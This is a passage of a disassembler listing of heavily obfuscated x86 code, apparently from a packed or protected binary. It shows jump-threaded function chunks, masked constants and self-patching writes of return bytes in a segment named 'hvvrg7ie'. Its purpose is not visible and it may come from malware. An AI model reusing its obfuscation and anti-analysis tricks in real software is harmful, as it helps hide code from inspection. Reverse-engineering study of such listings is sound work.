; END OF FUNCTION CHUNK	FOR sub_452637
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FCC

loc_44AD10:				; CODE XREF: sub_443FCC+Fj
		mov	eax, 86B13FACh
		call	sub_458A13
		mov	ds:off_41D1EC, eax
		lea	eax, sub_443AE2
		mov	byte ptr [eax],	0C3h
		jmp	sub_443AE2
; END OF FUNCTION CHUNK	FOR sub_443FCC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BCD

loc_44AD2E:				; CODE XREF: sub_443BCD-9D32j
		jnp	loc_44FC4F
		or	ebx, 0FF1B72D5h

loc_44AD3A:				; CODE XREF: sub_443BCD:loc_452A1Aj
		push	esi
		push	0E7E02D2Eh
		pop	esi
		and	esi, 0BAB14937h
		add	esi, 5DA4FE12h
		xchg	esi, [esp+8+var_8]
		jmp	loc_44671E
; END OF FUNCTION CHUNK	FOR sub_443BCD
; ---------------------------------------------------------------------------
		and	edi, 2BA05EB6h
		jmp	loc_445013
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_51. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_44AD61:				; CODE XREF: sub_45889B+1C84j
		jmp	nullsub_410
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AE37

loc_44AD66:				; CODE XREF: sub_44AE37+6j
		jmp	loc_457BEB
; END OF FUNCTION CHUNK	FOR sub_44AE37
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D23

loc_44AD6B:				; CODE XREF: sub_454D23:loc_44E4BEj
					; sub_454D23+6355j
		push	edx
		push	17CA2339h
		pop	edx
		rol	edx, 0Ch
		and	edx, 0EA5AC203h
		rol	edx, 13h
		jmp	loc_44A179
; END OF FUNCTION CHUNK	FOR sub_454D23
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4478FE

loc_44AD83:				; CODE XREF: sub_4478FE:loc_43FED5j
		pop	esi
		sub	edx, 52D09A24h
		rol	edx, 4
		add	edx, 2FF29EAEh
		xor	edx, 0D62B434h
		jmp	loc_4501E2
; END OF FUNCTION CHUNK	FOR sub_4478FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_44AD9E:				; CODE XREF: sub_43C0DE-3015j
		jg	loc_43ED91
		cdq
; END OF FUNCTION CHUNK	FOR sub_43C0DE

; =============== S U B	R O U T	I N E =======================================



sub_44ADA5	proc near		; CODE XREF: sub_43C0DE:loc_43D1E5j

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C201 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043FEB1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045727B SIZE 00000006 BYTES

		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+4+var_4]
		jmp	loc_43FEB1
sub_44ADA5	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A2AF

loc_44ADB0:				; CODE XREF: sub_44A2AF-8C83j
		mov	eax, [esp-8+arg_4]
		push	edx
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+0]
		push	31CA5257h
		pop	eax
		jmp	loc_4407F0
; END OF FUNCTION CHUNK	FOR sub_44A2AF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448B06

loc_44ADC5:				; CODE XREF: sub_448B06:loc_448B12j
					; DATA XREF: sub_446A88:loc_448AFCo
		xchg	edx, [esp+0]
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_448B06

; =============== S U B	R O U T	I N E =======================================



sub_44ADCD	proc near		; CODE XREF: sub_454318j
					; DATA XREF: sub_44BEBB+8453o
		xchg	eax, [esp+0]
		jmp	loc_444AFB
sub_44ADCD	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439B29

loc_44ADD5:				; CODE XREF: sub_439B29+Ej
					; sub_439B29+33BEj ...
		jmp	loc_452DA1
; ---------------------------------------------------------------------------

loc_44ADDA:				; CODE XREF: sub_45B9BB-6C4Cj
					; sub_439B29:loc_455B8Aj
		pop	ecx
		xchg	esi, [esp-4+arg_0]
		mov	ebp, esi
		pop	esi
		jmp	nullsub_384
; END OF FUNCTION CHUNK	FOR sub_439B29
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A088

loc_44ADE6:				; CODE XREF: sub_43A088+13j
		push	offset loc_4475CF
		jmp	loc_44D24C
; END OF FUNCTION CHUNK	FOR sub_43A088
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45493B

loc_44ADF0:				; CODE XREF: sub_45493B:loc_43CE68j
					; sub_45493B-17AC4j
		and	eax, 0AF7755h
		add	eax, 0FF9B739Ah
		push	offset sub_440B7A
		jmp	loc_447788
; END OF FUNCTION CHUNK	FOR sub_45493B
; ---------------------------------------------------------------------------
		rol	eax, 0Ah
		jmp	loc_449D37
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_44AE0E:				; CODE XREF: sub_454099:loc_456C9Bj
		sub	edi, 0C2069A33h
		pop	ebx
		jmp	loc_4474E7
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
		cmp	edx, 60D18C5h
		jmp	loc_43E4F6
; ---------------------------------------------------------------------------

loc_44AE25:				; CODE XREF: hvvrg7ie:00457478j
		sbb	ebx, ebp
		jmp	loc_456E6D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BFF5

loc_44AE2C:				; CODE XREF: sub_44BFF5:loc_445292j
		jz	loc_447520
		jmp	loc_4474DC
; END OF FUNCTION CHUNK	FOR sub_44BFF5

; =============== S U B	R O U T	I N E =======================================



sub_44AE37	proc near		; CODE XREF: sub_43C290+E4F3p
					; hvvrg7ie:0044CD6Dj

; FUNCTION CHUNK AT 0043C596 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004426AA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AD66 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045616C SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00457BEB SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00458071 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00459959 SIZE 0000000B BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	ebx
		pushf
		jmp	loc_44AD66
sub_44AE37	endp


; =============== S U B	R O U T	I N E =======================================



sub_44AE42	proc near		; DATA XREF: sub_451F65:loc_44AB42o

; FUNCTION CHUNK AT 0044C219 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457D25 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045879D SIZE 0000001A BYTES

		push	ecx
		push	0A20CD983h
		pop	ecx
		and	ecx, 2372C400h
		jmp	loc_44C219
sub_44AE42	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455751

loc_44AE54:				; CODE XREF: sub_455751+3j
		xchg	esi, [esp+0]
		call	sub_44ED23

loc_44AE5C:				; CODE XREF: hvvrg7ie:00451C4Cj
		jmp	sub_43B594
; END OF FUNCTION CHUNK	FOR sub_455751
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442B3C

loc_44AE61:				; CODE XREF: sub_442B3C+71C0j
		jmp	sub_44DE0A
; END OF FUNCTION CHUNK	FOR sub_442B3C
; ---------------------------------------------------------------------------

loc_44AE66:				; CODE XREF: hvvrg7ie:00453F70j
		and	esi, 0A3206F66h
; START	OF FUNCTION CHUNK FOR sub_443BCD

loc_44AE6C:				; CODE XREF: sub_443BCD:loc_453F54j
		sub	esi, 2AD3FFFh
		or	esi, 0C91D21D8h
		and	esi, 7186B4C7h
		add	esi, 9EBDF56Ah
		jmp	loc_459087
; END OF FUNCTION CHUNK	FOR sub_443BCD
; ---------------------------------------------------------------------------

loc_44AE89:				; DATA XREF: sub_43B63C+14C80o
		add	ebx, 3464227Ch
		xchg	ebx, [esp]
		jmp	sub_455751
; ---------------------------------------------------------------------------

loc_44AE97:				; CODE XREF: hvvrg7ie:0045ACECj
		shr	edi, 1Ah
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_44AE9A:				; CODE XREF: sub_44191F:loc_45ACDFj
		add	ebx, 0FF611332h
		push	offset sub_4508AD
		jmp	nullsub_438
; END OF FUNCTION CHUNK	FOR sub_44191F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449D53

loc_44AEAA:				; CODE XREF: sub_449D53:loc_450682j
		xor	edx, [ebx+ecx+4]
		cmp	edx, 7C61090Eh

loc_44AEB4:				; CODE XREF: sub_452609+Aj
		jz	loc_45A809

loc_44AEBA:				; CODE XREF: sub_4522F8-18065j
					; sub_449D53-7368j ...
		push	offset sub_44048E
		jmp	loc_45B89E
; END OF FUNCTION CHUNK	FOR sub_449D53
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_42. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_44AEC5:				; CODE XREF: sub_45889B-B006j
		jmp	loc_45A510
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------
		mov	edx, 0DE6CF580h
		call	sub_446A16
		push	eax
		ror	eax, 0Eh
		mov	ds:dword_452324, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_44AEDF:				; CODE XREF: sub_43F227:loc_4521CFj
		jmp	nullsub_261
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8AB

loc_44AEE4:				; CODE XREF: sub_4413A5-3F56j
					; sub_43F8AB+D27Bj
		rol	eax, 0Eh
		jmp	loc_450F35
; END OF FUNCTION CHUNK	FOR sub_43F8AB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4449AD

loc_44AEEC:				; CODE XREF: sub_440643-4694j
					; sub_4449AD+4j
		push	907B5A4Ch
		sbb	esi, ebx
		adc	edx, esi
		push	ecx
		sub	edx, ebx
		jmp	loc_43E0BC
; END OF FUNCTION CHUNK	FOR sub_4449AD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439C28

loc_44AEFD:				; CODE XREF: sub_439C28:loc_45A4FFj
		mov	eax, ecx
		pop	ecx
		xchg	eax, [esp-10h+arg_C]
; END OF FUNCTION CHUNK	FOR sub_439C28
; START	OF FUNCTION CHUNK FOR sub_450246

loc_44AF03:				; CODE XREF: sub_450246:loc_45649Dj
		mov	edx, eax
		jmp	loc_441733
; END OF FUNCTION CHUNK	FOR sub_450246
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DB2

loc_44AF0A:				; CODE XREF: sub_448DB2:loc_4414FDj
		jge	loc_43928E

loc_44AF10:				; CODE XREF: sub_4533F2-13230j
		jmp	loc_4587D6
; END OF FUNCTION CHUNK	FOR sub_448DB2
; ---------------------------------------------------------------------------
		popf
		sbb	ecx, 87C54BABh
		pushf
		jmp	loc_439286
; ---------------------------------------------------------------------------
		add	ebp, 0E5281788h
		shr	edi, 0Dh
		jmp	sub_458746
; ---------------------------------------------------------------------------

loc_44AF30:				; CODE XREF: hvvrg7ie:00448D78j
		jle	loc_4480ED
; START	OF FUNCTION CHUNK FOR sub_443BCD

loc_44AF36:				; CODE XREF: sub_443BCD+519Aj
		sub	esi, 7DE39E83h
		add	esi, 2FB7180Ah
		mov	[esi], eax
		pop	esi
		lea	eax, sub_43F98C
		jmp	loc_450F3C
; END OF FUNCTION CHUNK	FOR sub_443BCD
; ---------------------------------------------------------------------------

loc_44AF50:				; CODE XREF: hvvrg7ie:0043C8DBj
		mov	esi, ebx
		sbb	ecx, ebp
		cmp	eax, 0E3BB6D79h
		jmp	loc_442920
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_44AF5F:				; CODE XREF: sub_450AA8:loc_4560A9j
		xchg	ecx, [esp-4+arg_0]
		call	sub_44C072

loc_44AF67:				; CODE XREF: hvvrg7ie:004417FDj
		call	sub_4453EC

loc_44AF6C:				; DATA XREF: sub_43A839+21EEo
		push	0BEADF5DAh
		pop	edi
		xor	edi, 0ABDE34E2h
		jnz	loc_450BC7

loc_44AF7E:				; CODE XREF: sub_452D54+11j
		jmp	loc_43E823
; END OF FUNCTION CHUNK	FOR sub_450AA8
; ---------------------------------------------------------------------------
		jns	loc_44E02C
		cmp	edx, 0BB446000h
		jmp	loc_442347
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408AE

loc_44AF94:				; CODE XREF: sub_4408AE:loc_447E4Cj
		push	edi
		push	0A2769C9Eh
		rol	edi, 7
		jmp	loc_449CD7
; END OF FUNCTION CHUNK	FOR sub_4408AE

; =============== S U B	R O U T	I N E =======================================



sub_44AFA2	proc near		; DATA XREF: sub_43A839:loc_45636Ao
		push	ebp
		call	sub_4561C8

locret_44AFA8:				; CODE XREF: hvvrg7ie:loc_452228j
		retn
sub_44AFA2	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449785

loc_44AFA9:				; CODE XREF: sub_449785-2279j
		jmp	nullsub_545
; END OF FUNCTION CHUNK	FOR sub_449785
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449425

loc_44AFAE:				; CODE XREF: sub_449425-40A0j
		jmp	loc_443B34
; END OF FUNCTION CHUNK	FOR sub_449425
; ---------------------------------------------------------------------------

loc_44AFB3:				; CODE XREF: hvvrg7ie:0044A204j
		pop	eax
		sub	edi, 6802E07h
; START	OF FUNCTION CHUNK FOR sub_45B9BB

loc_44AFBA:				; CODE XREF: sub_45B9BB:loc_44A1E1j
		and	eax, 2398C793h
		add	eax, 66CB985Ch
		add	eax, ebp
		add	eax, 772BA08Fh
		mov	eax, [eax]
		mov	al, [eax]
		jmp	loc_43C854
; END OF FUNCTION CHUNK	FOR sub_45B9BB

; =============== S U B	R O U T	I N E =======================================



sub_44AFD7	proc near		; CODE XREF: hvvrg7ie:00450F2Bp
					; hvvrg7ie:004512EFj

; FUNCTION CHUNK AT 004482A1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DF2A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E0E9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004513E6 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045675E SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+0]
		jmp	loc_45675E
sub_44AFD7	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4591C3

loc_44AFE6:				; CODE XREF: sub_4591C3-11857j
		pop	edi
		or	edi, 58BFE491h
		xor	edi, 1FFA4098h
		or	edi, 0D11A1E33h
		jmp	loc_45677A
; END OF FUNCTION CHUNK	FOR sub_4591C3
; ---------------------------------------------------------------------------

loc_44AFFE:				; CODE XREF: hvvrg7ie:0043A3ABj
		jz	loc_4471DD
		jmp	loc_44F47D
; ---------------------------------------------------------------------------
		cdq
		jmp	loc_44C2CB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446956

loc_44B00F:				; CODE XREF: sub_446956+Bj
		pop	edx
		mov	eax, [esp-8+arg_4]
		push	edx
		push	esi
		jmp	loc_456D41
; END OF FUNCTION CHUNK	FOR sub_446956
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_44B01A:				; CODE XREF: sub_44191F:loc_43D699j
		push	0C949969Fh
		pop	ebx
		sub	ebx, 0C865E207h
		test	ebx, 10h
		jmp	loc_45ACDF
; END OF FUNCTION CHUNK	FOR sub_44191F

; =============== S U B	R O U T	I N E =======================================



sub_44B031	proc near		; DATA XREF: sub_44098D+6o

; FUNCTION CHUNK AT 00447B4E SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00458064 SIZE 00000005 BYTES

		push	7EB23086h
		pop	ecx
		xor	ecx, 72806AF0h
		sub	ecx, 0B7095882h
		rol	ecx, 17h
		add	ecx, 619E6E0h
		mov	[ecx], edx
		pop	ecx
		jmp	loc_458064
sub_44B031	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44955C

loc_44B054:				; CODE XREF: sub_44955C-DB67j
		jz	loc_440840
		add	edx, 9A985A96h
		jmp	loc_44D3BA
; END OF FUNCTION CHUNK	FOR sub_44955C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_127. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44B066:				; CODE XREF: hvvrg7ie:004402B2j
		jmp	loc_453146
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C811

loc_44B06B:				; CODE XREF: sub_43C811:loc_43EA05j
		add	eax, 3855EE32h

loc_44B071:				; CODE XREF: hvvrg7ie:loc_450BBFj
					; sub_43F227:loc_4539CFj
		mov	eax, [eax]
		popf
		mov	al, [eax]
		jo	loc_44DADC

loc_44B07C:				; CODE XREF: hvvrg7ie:loc_455FFBj
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		jmp	loc_43A12B
; END OF FUNCTION CHUNK	FOR sub_43C811
; ---------------------------------------------------------------------------

loc_44B088:				; CODE XREF: hvvrg7ie:00451F0Bj
		mov	ebp, esp
		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp]
		push	offset loc_43F826
		jmp	loc_440D81
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B29

loc_44B09A:				; CODE XREF: sub_444B29+FFD4j
		sub	esi, ebx

loc_44B09C:				; CODE XREF: sub_444B29:loc_456EBDj
		mov	eax, [ebp-4]
		cmp	dword ptr [eax+3Ch], 0
		jz	loc_447CE9
		jmp	loc_440F17
; END OF FUNCTION CHUNK	FOR sub_444B29
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A52

loc_44B0AE:				; CODE XREF: sub_45038B-15466j
					; sub_456A52:loc_43FFB3j
		rol	esi, 1Fh
		and	esi, 9A8564A5h
		add	esi, 208E881Ch
		add	esi, ebp
		add	esi, 4F6C37CCh
		mov	esi, [esi]
		xchg	esi, [esp+4+var_4]
		call	eax

loc_44B0CC:				; CODE XREF: hvvrg7ie:loc_459537j
		jmp	loc_43B5F7
; END OF FUNCTION CHUNK	FOR sub_456A52
; ---------------------------------------------------------------------------

loc_44B0D1:				; CODE XREF: hvvrg7ie:00455235j
		ja	loc_446A98
		cmp	ecx, 4E326E9h
		jmp	loc_4447E3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_44B0E2:				; CODE XREF: sub_44191F:loc_44BE0Fj
					; hvvrg7ie:loc_4509FEj
		adc	eax, 0EE9DBB91h
		jmp	loc_456831
; END OF FUNCTION CHUNK	FOR sub_44191F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EBB6

loc_44B0ED:				; CODE XREF: sub_43EBB6+Fj
		add	esp, 8
		mov	eax, [eax]
		add	eax, [ebp-4]
		call	sub_44F66B
		cmp	eax, [ebp-8]
		jnz	loc_44B18F
		jmp	loc_452372
; END OF FUNCTION CHUNK	FOR sub_43EBB6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4405D7

loc_44B108:				; CODE XREF: sub_4405D7+114B5j
		popf
		test	ebx, 507B5F6h
		jmp	loc_4431B6
; END OF FUNCTION CHUNK	FOR sub_4405D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_44B114:				; CODE XREF: sub_43E128+21j
		cmp	dword ptr [ebp-8], 0
		jle	loc_445888
		mov	eax, [ebp-4]
		xor	edx, edx
		push	edx
		push	eax
		jmp	loc_441B9F
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_44B12A:				; CODE XREF: sub_45038B-14628j
		jns	loc_44AB36
		jmp	loc_441F88
; END OF FUNCTION CHUNK	FOR sub_45038B

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44B135	proc near		; CODE XREF: sub_44E560j

var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	[ebp+var_4], eax
		mov	eax, [ebp+var_4]
		jmp	loc_459BC7
sub_44B135	endp

; ---------------------------------------------------------------------------

loc_44B144:				; CODE XREF: hvvrg7ie:00459435j
		ror	esi, 2

; =============== S U B	R O U T	I N E =======================================



sub_44B147	proc near		; CODE XREF: hvvrg7ie:004482C9p

arg_0		= dword	ptr  4

		xchg	esi, [esp+0]
		pop	esi
		add	ecx, 1C51A03h
		xchg	ecx, [esp-4+arg_0]
		jmp	sub_449EB1
sub_44B147	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44B159:				; CODE XREF: hvvrg7ie:00453CC7j
		or	ecx, edx
		cmp	edx, 55F0C70Bh
		jmp	loc_43B7D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442ADB

loc_44B166:				; CODE XREF: sub_442ADB-45F8j
		rol	edi, 1Dh
		call	sub_459070
; END OF FUNCTION CHUNK	FOR sub_442ADB
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_44B16E:				; CODE XREF: sub_44616F-422Bj
		jmp	loc_43941C
; END OF FUNCTION CHUNK	FOR sub_44616F
; ---------------------------------------------------------------------------
		sub	eax, edx
		jmp	sub_44E44E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_319. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44B17B:				; CODE XREF: hvvrg7ie:0044920Aj
		jmp	sub_450C5A
; ---------------------------------------------------------------------------
		or	ecx, 0BBD053EEh
		jmp	sub_43D2D8
; ---------------------------------------------------------------------------

loc_44B18B:				; DATA XREF: sub_43C421+15A0o
		mov	esp, ebp
		pop	ebp
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EBB6

loc_44B18F:				; CODE XREF: sub_44290B+7j
					; sub_43EBB6+C547j
		inc	dword ptr [ebp-18h]
		dec	dword ptr [ebp-1Ch]
		jnz	loc_44B5AE
		jmp	loc_4596AF
; END OF FUNCTION CHUNK	FOR sub_43EBB6
; ---------------------------------------------------------------------------

loc_44B1A0:				; CODE XREF: hvvrg7ie:loc_45986Fj
		and	esi, 0F43EE5FDh
		add	esi, 1C1F7DFCh
		xchg	esi, [esp]
		jmp	sub_446D8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_44B1B4:				; CODE XREF: sub_44616F:loc_44D16Bj
					; sub_43F227+16B49j
		xchg	edx, [esp+0Ch+var_C]
		mov	ebx, edx
		xchg	ebx, [esp+0Ch+var_C]
		call	sub_454E54
		jmp	loc_44F509
; END OF FUNCTION CHUNK	FOR sub_43F227

; =============== S U B	R O U T	I N E =======================================



sub_44B1C6	proc near		; DATA XREF: sub_440195+1113Do

; FUNCTION CHUNK AT 0043B43F SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043DCAE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F4DE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FB8E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004424D3 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00446DA8 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 004471DD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044781C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044B985 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F3D4 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044F483 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00450C73 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004517DD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455EFE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456C11 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004573ED SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045AFCB SIZE 00000010 BYTES

		test	al, al
		jz	loc_455EFE
		jmp	loc_44B985
sub_44B1C6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44B1D3:				; CODE XREF: hvvrg7ie:0045701Aj
		jl	loc_44092A
		add	ebx, 0C53B18D6h
		push	ecx
		jmp	loc_44092A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F4D4

loc_44B1E5:				; CODE XREF: sub_44F4D4-14217j
		and	eax, 33DA5F50h
		xor	eax, 0D717B566h
		sub	eax, 7308216h
		add	eax, 43176A84h
		xchg	eax, [esp+8+var_8]
		jmp	loc_447361
; END OF FUNCTION CHUNK	FOR sub_44F4D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B3F1

loc_44B205:				; CODE XREF: sub_44B3F1+2EB7j
					; sub_44B3F1:loc_45496Ej
		mov	eax, 33F214AFh
		push	esi

loc_44B20B:				; CODE XREF: hvvrg7ie:004564D9j
		push	13F40741h
		pop	esi
		rol	esi, 9
		add	esi, 1836F174h
		jmp	loc_445FFE
; END OF FUNCTION CHUNK	FOR sub_44B3F1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458175

loc_44B21F:				; CODE XREF: sub_458175-F50Aj
		xchg	esi, [esp+4+var_4]
		call	sub_43B851

loc_44B227:				; CODE XREF: hvvrg7ie:004462DDj
		jmp	nullsub_302
; END OF FUNCTION CHUNK	FOR sub_458175
; ---------------------------------------------------------------------------

loc_44B22C:				; CODE XREF: hvvrg7ie:0043FD26j
		jmp	loc_44928B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450FF2

loc_44B231:				; CODE XREF: sub_453BBD:loc_4395CCj
					; sub_450FF2:loc_43C7FBj
		sub	ecx, 2F92C168h
		or	ecx, 3E8543B9h
		add	ecx, 0C07FAB44h
		push	offset sub_4545DB
		jmp	nullsub_221
; END OF FUNCTION CHUNK	FOR sub_450FF2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D671

loc_44B24D:				; CODE XREF: sub_44D671:loc_446552j
		jnz	loc_44E177
		jmp	loc_4503B7
; END OF FUNCTION CHUNK	FOR sub_44D671
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_44B258:				; CODE XREF: sub_445CCD+6704j
		xchg	ecx, [esp+8+var_8]
		push	ebx
		push	0FCA73EEAh
		pop	ebx
		sub	ebx, 0E84D962Dh
		xor	ebx, 1459A9BDh
		xchg	ebx, [esp+0Ch+var_C]
		pushf
		jmp	loc_43B56F
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------

loc_44B277:				; CODE XREF: hvvrg7ie:0044AB07j
		mov	byte ptr [eax],	0C3h
		jmp	loc_443613
; ---------------------------------------------------------------------------
		call	nullsub_11
		jmp	ds:dword_41D0DC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_11. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_44B28B:				; CODE XREF: sub_43F227:loc_45266Fj
		jb	loc_455D6A
		jmp	loc_448FD1
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45488E

loc_44B296:				; CODE XREF: sub_45488E+5j
		mov	edi, ecx
		xchg	edi, [esp+0]
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_458D6C
		jmp	loc_43E25F
; END OF FUNCTION CHUNK	FOR sub_45488E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_44B2A9:				; CODE XREF: sub_450F97:loc_44C6FCj
		pop	eax
		or	eax, 17D3178Fh
		rol	eax, 13h
		sub	eax, 30F0383Dh
		jmp	loc_44273C
; END OF FUNCTION CHUNK	FOR sub_450F97
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_212. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CB5

loc_44B2BF:				; CODE XREF: sub_445CB5+4B0Aj
		jmp	loc_442278
; END OF FUNCTION CHUNK	FOR sub_445CB5
; ---------------------------------------------------------------------------
		and	edx, 80ABDC84h
		jge	loc_43B72E
		jmp	sub_44CCA7

; =============== S U B	R O U T	I N E =======================================



sub_44B2D5	proc near		; CODE XREF: hvvrg7ie:0043986Ej
					; sub_447800+12p

; FUNCTION CHUNK AT 00439172 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043A47A SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00441C40 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045A143 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	esi
		push	532E47Bh
		pop	esi
		sub	esi, 3765A48Eh
		rol	esi, 9
		jmp	loc_439172
sub_44B2D5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44B2EE:				; CODE XREF: hvvrg7ie:00442EA3j
		xchg	esi, [esp]
		jmp	loc_44D423
; ---------------------------------------------------------------------------
		cdq
